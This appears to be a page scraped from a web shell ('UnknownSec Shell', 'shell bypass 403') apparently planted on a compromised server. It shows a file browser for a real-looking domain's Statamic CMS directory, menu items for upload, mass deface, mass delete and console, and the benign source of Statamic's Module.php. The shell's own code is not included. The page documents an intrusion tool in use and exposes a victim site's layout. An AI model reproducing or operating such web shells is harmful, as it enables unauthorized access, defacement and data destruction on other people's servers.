shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
StarterKits
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Module.php
<?php namespace Statamic\StarterKits; use Illuminate\Filesystem\Filesystem; use Illuminate\Support\Collection; use Statamic\StarterKits\Exceptions\StarterKitException; abstract class Module { use Concerns\InteractsWithFilesystem; protected $files; protected $config; protected $key; /** * Instantiate starter kit module. */ public function __construct(array|Collection $config, string $key) { $this->files = app(Filesystem::class); $this->config = collect($config); $this->key = $key; } /** * Get module key. */ public function key(): string { return $this->key; } /** * Check if this is a top level module. */ public function isTopLevelModule(): bool { return $this->key === 'top_level'; } /** * Get module config. */ public function config(?string $key = null): mixed { if ($key) { return $this->config->get($key); } return $this->config; } /** * Get `export_paths` paths as collection from config. */ protected function exportPaths(): Collection { return collect($this->config('export_paths') ?? []); } /** * Get `export_as` paths (to be renamed on install) as collection from config. */ protected function exportAsPaths(): Collection { return collect($this->config('export_as') ?? []); } /** * Ensure nested module config is not empty. * * @throws StarterKitException */ protected function ensureModuleConfigNotEmpty(): self { $hasConfig = $this->config()->has('export_paths') || $this->config()->has('export_as') || $this->config()->has('dependencies') || $this->config()->has('dependencies_dev') || $this->config()->has('modules'); if (! $hasConfig) { throw new StarterKitException('Starter-kit module is missing `export_paths`, `dependencies`, or nested `modules`!'); } return $this; } }
© 2026 UnknownSec